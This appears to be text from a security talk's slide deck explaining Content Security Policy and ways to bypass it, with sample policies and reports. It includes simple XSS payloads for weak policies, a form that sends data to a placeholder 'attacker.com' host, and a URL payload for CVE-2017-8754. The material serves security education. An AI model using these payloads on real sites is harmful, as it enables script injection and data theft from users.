Content Security Policy (CSP) is a security policy that helps prevent cross-site scripting attacks and other injection attacks. CSP uses whitelists and directives to define what resources are allowed to load on a given page, and blocks or reports usage of unauthorized resources. However, there are some ways CSP can potentially be bypassed, such as misconfigurations in the CSP, exploiting JSON padding, or vulnerabilities in how CSP is implemented on a site. Attackers need to carefully test configurations and look for implementation flaws to find ways to bypass the protections of CSP.

1. Content Security Policy (CSP)
Bypass
Niraj Kumar Choubey
https://medium.com/@nir.choubey.2011
Pawan Jaiswal
https://medium.com/@pawanjswal.k

2. CSP !!! What is that ??
• Use whitelists to tell the client what's allowed and what isn’t
• Uses directives which defines loading behaviour of resource
• Inline code and eval() are considered harmful
• Report policy violations to your server before enforcing them

3. Source Whitelists
• Content-Security-Policy: script-src 'self' https://apis.google.com

4. Resource Directives
• img-src
• media-src
• object-src
• frame-src
• form-action
• font-src
• connect-src
• script-src
• base-uri
• frame-ancestors
• upgrade-insecure-request
• style-src
• child-src
• report-uri

5. Implementation
• Content-Security-Policy in response header in each page
• <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src
https://*; child-src 'none’;”> on each page
• CSP violation can also be reported using report-uri directive

6. Inline Scripting
• script-src: ‘self’ prevent inline script injection, biggest xss threat
• eval() is also blocked
• <script nonce=EDNnf03nceIOfn39fn3e9h3sdfa>
//Some inline code I can’t remove yet
</script>
Content-Security-Policy: script-src 'nonce-EDNnf03nceIOfn39fn3e9h3sdfa'

7. Reporting Violation
• Content-Security-Policy: default-src 'self’; report-uri /my_amazing_csp_report_parser;
• {
"csp-report": {
"document-uri": "http://example.org/page.html",
"referrer": "http://evil.example.com/",
"blocked-uri": "http://evil.example.com/evil.js",
"violated-directive": "script-src 'self' https://apis.google.com",
"original-policy": "script-src 'self' https://apis.google.com; report-uri
http://example.org/my_amazing_csp_report_parser"
}
}

8. I wan to bypass it. Can I do that ?
• 4XX Client Error
• Misconfigurations
• Exploiting JSONP
• CSP Data – Extraction Google Analytics
• CVE-2017-8754

9. Example 1: 4XX Client Error
• 404 – Not Found
• 403 – Forbidden
• 414 - Request URI Too Large

10. Example 2: Misconfiguration
• script-src: ‘self’ ‘unsafe-inline’
• <script>alert(‘HURRAY!!!’);</script>
• script-src: ‘self’ data:
• <script src=“data:,alert(‘HURRAY!!!’)”></script>
• default-src: ‘self’
• <form action=“http://attacker.com”>

11. Example 3:JSON Padding

12. Example 5: CSP Data – Extraction Google Analytics

13. Example 5: CSP Data – Extraction Google Analytics

14. Example 5: CVE-2017-8754
• What is CSP implementation is !
• <meta http-equiv="Content-Security-Policy" content="script-src 'self’”>
• Payload
• http://example.com/xss.html?<meta http-equiv=”Content-Security-Policy”
content=”script-src ‘self’”>
• Final
• <me#a http-equiv=”Content-Security-Policy” content=”script-src ‘self’”>